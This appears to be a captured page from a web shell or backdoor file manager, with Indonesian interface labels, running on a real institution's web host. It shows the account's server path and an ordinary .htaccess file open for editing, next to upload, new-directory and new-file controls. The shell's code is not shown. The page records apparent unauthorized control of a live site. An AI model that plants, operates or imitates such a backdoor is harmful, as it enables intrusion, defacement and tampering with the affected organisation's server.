CURRENT PATH:
/
home
/
u921493091
/
domains
/
dpsinstitute.ac.in
/
public_html
/
[ ⬅ KEMBALI ]
|
[ HOME ]
Upload File:
Upload Ke Sini
Dir Baru
File Baru
Editing:
.htaccess
<IfModule mod_rewrite.c> # That was ONLY to protect you from 500 errors # if your server did not have mod_rewrite enabled RewriteEngine On # RewriteBase / # NOT needed unless you're using mod_alias to redirect RewriteCond %{REQUEST_URI} !/public RewriteRule ^(.*)$ public/$1 [L] # Direct all requests to /public folder </IfModule> RewriteCond %{HTTP_HOST} ^dpsinstitute\.ac\.in$ RewriteRule ^www\.dpsinstitute\.ac\.in$ "https\:\/\/dpsinstitute\.ac\.in\/" [R=301,L] # php -- BEGIN cPanel-generated handler, do not edit # Set the “ea-php82” package as the default “PHP” programming language. <IfModule mime_module> AddHandler application/x-httpd-ea-php82___lsphp .php .php8 .phtml </IfModule> # php -- END cPanel-generated handler, do not edit
SIMPAN
[ BATAL ]